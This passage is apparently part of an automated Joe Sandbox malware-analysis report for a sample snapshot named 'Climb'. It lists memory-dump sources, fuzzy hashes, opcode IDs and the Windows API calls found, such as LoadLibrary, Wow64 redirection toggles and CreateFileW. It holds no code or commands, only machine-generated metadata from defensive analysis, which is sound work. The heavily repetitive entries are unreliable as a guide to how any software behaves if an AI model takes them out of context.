                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1550534281-0
                                                                                                                                                                      • Opcode ID: 68fc59f1fb8f5c180aefd94e4fe74804dd465ef161315d44c51db34a4cc7337a
                                                                                                                                                                      • Instruction ID: dee0e1f7e4882973ccd00196d91df362ade03cb584152e16ee55c5130d9feb05
                                                                                                                                                                      • Opcode Fuzzy Hash: 68fc59f1fb8f5c180aefd94e4fe74804dd465ef161315d44c51db34a4cc7337a
                                                                                                                                                                      • Instruction Fuzzy Hash: F2F05432554B889FE701AF60EC0AF643BA0B764B0BF004C1BBE05961E2DBBE4159AB54
                                                                                                                                                                      APIs
                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 004FCEEE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Init_thread_footer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1385522511-0
                                                                                                                                                                      • Opcode ID: 174e500a03d1e0635f6c93f84aba096ef86094490a11353317a098215e7dafff
                                                                                                                                                                      • Instruction ID: 017c64991c7b9be2a8b75db5cddd3ac4e4a3f8174b307881a6020299627a5945
                                                                                                                                                                      • Opcode Fuzzy Hash: 174e500a03d1e0635f6c93f84aba096ef86094490a11353317a098215e7dafff
                                                                                                                                                                      • Instruction Fuzzy Hash: C232BD74A0064D9FDB10CF54C984AFEBBB5FF44308F14845AEA06AB291C778AD85CB99
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LoadString
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2948472770-0
                                                                                                                                                                      • Opcode ID: 66a1ad8064310c78002b130ba32577a3cec20e8e96ee56330e0ca9f3f54e2eb4
                                                                                                                                                                      • Instruction ID: 6775cadc94264884cd4ca85b662effb47ddbd1145799c821c5908944037da53a
                                                                                                                                                                      • Opcode Fuzzy Hash: 66a1ad8064310c78002b130ba32577a3cec20e8e96ee56330e0ca9f3f54e2eb4
                                                                                                                                                                      • Instruction Fuzzy Hash: F8D16C74A0420ADFCB14EF94E8819FDBBB5FF48314F14815AE919AB291EB30AD41DF94
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 42806355091becacacd2778329222c77e48c08e79c54610e8163d5c0f535614c
                                                                                                                                                                      • Instruction ID: a0035d276f3c0fd2892ac93761782ead6634cd8f926a9e28beedca7cfcbf439c
                                                                                                                                                                      • Opcode Fuzzy Hash: 42806355091becacacd2778329222c77e48c08e79c54610e8163d5c0f535614c
                                                                                                                                                                      • Instruction Fuzzy Hash: E951BB79A00118AFEB10DF58CC45AE97FA1FFC5364F198168E8199B391D771ED82CB50
                                                                                                                                                                      APIs
                                                                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 0055FCCE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: BuffCharLower
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2358735015-0
                                                                                                                                                                      • Opcode ID: b9bde81ae4733a055c1d49b91c43377938b3a8948e6a5bc29c098ad9e601c60b
                                                                                                                                                                      • Instruction ID: 43740b317c718574b50150c20b865e75023ffc9c8d34c9fff94e3da05ae21b3e
                                                                                                                                                                      • Opcode Fuzzy Hash: b9bde81ae4733a055c1d49b91c43377938b3a8948e6a5bc29c098ad9e601c60b
                                                                                                                                                                      • Instruction Fuzzy Hash: 1841E472500209AFDB11EF68C8909AEBBB9FF44315B21453FEA12D7291EB70DE48CB50
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004F663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,004F668B,?,?,004F62FA,?,00000001,?,?,00000000), ref: 004F664A
                                                                                                                                                                        • Part of subcall function 004F663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 004F665C
                                                                                                                                                                        • Part of subcall function 004F663E: FreeLibrary.KERNEL32(00000000,?,?,004F668B,?,?,004F62FA,?,00000001,?,?,00000000), ref: 004F666E
                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,004F62FA,?,00000001,?,?,00000000), ref: 004F66AB
                                                                                                                                                                        • Part of subcall function 004F6607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00535657,?,?,004F62FA,?,00000001,?,?,00000000), ref: 004F6610
                                                                                                                                                                        • Part of subcall function 004F6607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 004F6622
                                                                                                                                                                        • Part of subcall function 004F6607: FreeLibrary.KERNEL32(00000000,?,?,00535657,?,?,004F62FA,?,00000001,?,?,00000000), ref: 004F6635
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2632591731-0
                                                                                                                                                                      • Opcode ID: 1dd6666314a3ef7f403d3791303ae9ca7e970ad36fcc9787a80b5096cc9f4724
                                                                                                                                                                      • Instruction ID: d9e61cb16a0fcf75bc01ba7cfbe12489dde9b4f3b4e52b09f1f78cf4970573c2
                                                                                                                                                                      • Opcode Fuzzy Hash: 1dd6666314a3ef7f403d3791303ae9ca7e970ad36fcc9787a80b5096cc9f4724
                                                                                                                                                                      • Instruction Fuzzy Hash: A311E772600209AADF14BB25C803BBD7BA5AF50718F11442FF643E61C2EE79DA059B68
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __wsopen_s
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3347428461-0
                                                                                                                                                                      • Opcode ID: 5dffb18c2a04fa28b687d0ca80b91dbaf07d6ce0fb44c2a01573d71e519ea0ae
                                                                                                                                                                      • Instruction ID: f6b7d2a5aea5586e69e9d2f3a950ccc2557333ad00a33d155357dbe09b920472
                                                                                                                                                                      • Opcode Fuzzy Hash: 5dffb18c2a04fa28b687d0ca80b91dbaf07d6ce0fb44c2a01573d71e519ea0ae
                                                                                                                                                                      • Instruction Fuzzy Hash: A111487190420AAFCB05DF98E9449AA7BF4FF49300F1444A9F808AB351DA31EA218BA4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                      • Instruction ID: b4c1e9fe25b8e16d0322b156f5826aac5e194859877060d9cdc05e3bdf822371
                                                                                                                                                                      • Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                      • Instruction Fuzzy Hash: 1CF0A93650162556E6313A66AC0A7EA3F58BFC3334F100B25F926971D1EA74E88286E2
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 0056F987
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: EnvironmentVariable
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1431749950-0
                                                                                                                                                                      • Opcode ID: ed6bef072618554d8582e63e6788a44a39010adf91de0d1c4346231481ce419c
                                                                                                                                                                      • Instruction ID: 549acb411a86d623f4401d890414f22e877eab06332cd0bda48b0ca5e6c4fe1b
                                                                                                                                                                      • Opcode Fuzzy Hash: ed6bef072618554d8582e63e6788a44a39010adf91de0d1c4346231481ce419c
                                                                                                                                                                      • Instruction Fuzzy Hash: CFF08176A00105BFDB00EBA5DC4ADAF7BB8FF95720F000059F5059B2A0DE74A980C765
                                                                                                                                                                      APIs
                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,00516A79,?,0000015D,?,?,?,?,005185B0,000000FF,00000000,?,?), ref: 00523BC5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                      • Opcode ID: f7e083bbb4afcd414454cfeace94163db51cddcc3f0a55b8694ace33757b7247
                                                                                                                                                                      • Instruction ID: d80d096ee92865e105ef7cd24aaf6cb727c991a98a48d1e99a2204a7dc9bc15f
                                                                                                                                                                      • Opcode Fuzzy Hash: f7e083bbb4afcd414454cfeace94163db51cddcc3f0a55b8694ace33757b7247
                                                                                                                                                                      • Instruction Fuzzy Hash: 06E0ED31200A35A6EB203F72BC09F9A3E48BF837A0F140560EC15A60D0DF3CCE8282E0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 1427fd01bdcedb660834d8f44958dc9937c7a9ef37e0a1e6c80beeb5af62a614
                                                                                                                                                                      • Instruction ID: 9b595e5300c10cb041c2c7febd932b1de8b5bd5396a5b544405b66b60b41d515
                                                                                                                                                                      • Opcode Fuzzy Hash: 1427fd01bdcedb660834d8f44958dc9937c7a9ef37e0a1e6c80beeb5af62a614
                                                                                                                                                                      • Instruction Fuzzy Hash: 29F06DB1105702DFDB349FA4D8A5826BBF4BF14329325893EE6D787610C7359884DF54
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ClearVariant
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1473721057-0
                                                                                                                                                                      • Opcode ID: 3a23867896214bd5a6804ceb89d5718dff137e80e9db4c73e3a19978abd782ae
                                                                                                                                                                      • Instruction ID: 929d77aa361a41efce595be9c9decd3ca6e4040adbb42774f5507d31167deafa
                                                                                                                                                                      • Opcode Fuzzy Hash: 3a23867896214bd5a6804ceb89d5718dff137e80e9db4c73e3a19978abd782ae
                                                                                                                                                                      • Instruction Fuzzy Hash: 62F0E5B1B04605AAE7209B64980ABE6FFE8BB11318F10491ED8D5831C1C7F644D8A763
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __fread_nolock
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2638373210-0
                                                                                                                                                                      • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                      • Instruction ID: 800092f60a871af972d9351f204c939a32ee319b74ad55ff47470391107fa8f5
                                                                                                                                                                      • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                      • Instruction Fuzzy Hash: B6F0F87550020DFFDF05DF90C941EAEBB79FB04358F208449F9159A151D336EA61ABA1
                                                                                                                                                                      APIs
                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000002,?), ref: 004F3963
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: IconNotifyShell_
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1144537725-0
                                                                                                                                                                      • Opcode ID: c5c309c0c2a1d8e438e73716bb845f89060edf14c477bb2d914f522f1f238b39
                                                                                                                                                                      • Instruction ID: 7bc79a76a0cea75af087886b08431e02c16029ebafc05cdb4f559307105b64c6
                                                                                                                                                                      • Opcode Fuzzy Hash: c5c309c0c2a1d8e438e73716bb845f89060edf14c477bb2d914f522f1f238b39
                                                                                                                                                                      • Instruction Fuzzy Hash: B8F037709143589FEB529F24DC49BD67BFCB711B08F0044A5A644E6292DBB4578CCF51
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004F3A76
                                                                                                                                                                        • Part of subcall function 004F8577: _wcslen.LIBCMT ref: 004F858A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LongNamePath_wcslen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 541455249-0
                                                                                                                                                                      • Opcode ID: 199f90cacf0d19161e6d24b07905f401175f4aad17808908741c287f6401312d
                                                                                                                                                                      • Instruction ID: b4509277428093b79d1bf435bfb27fffa725deacafd8223d16061595c3404e0e
                                                                                                                                                                      • Opcode Fuzzy Hash: 199f90cacf0d19161e6d24b07905f401175f4aad17808908741c287f6401312d
                                                                                                                                                                      • Instruction Fuzzy Hash: 5DE0CD7690012857C710A2589C05FEE77EDDFC8790F044075FD05D7254D964DD809694
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,00000000,?,00530A84,?,?,00000000,?,00530A84,00000000,0000000C), ref: 00530737
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                      • Opcode ID: fec4bbbb8dcb92baedf5fe2f8c2d3c48679d45a0eff6766846cafb5a77e1c0b4
                                                                                                                                                                      • Instruction ID: 582a20cca0ad49b898f9fa118eb8643ba1bbb6611a6f6fcd60e1cab76ec562ff
                                                                                                                                                                      • Opcode Fuzzy Hash: fec4bbbb8dcb92baedf5fe2f8c2d3c48679d45a0eff6766846cafb5a77e1c0b4
                                                                                                                                                                      • Instruction Fuzzy Hash: FDD06C3200010DBBDF028F84DD46EDA3BAAFB48714F014000BE18A6060C732E821EB90
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?,0055D840), ref: 0055EAB1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
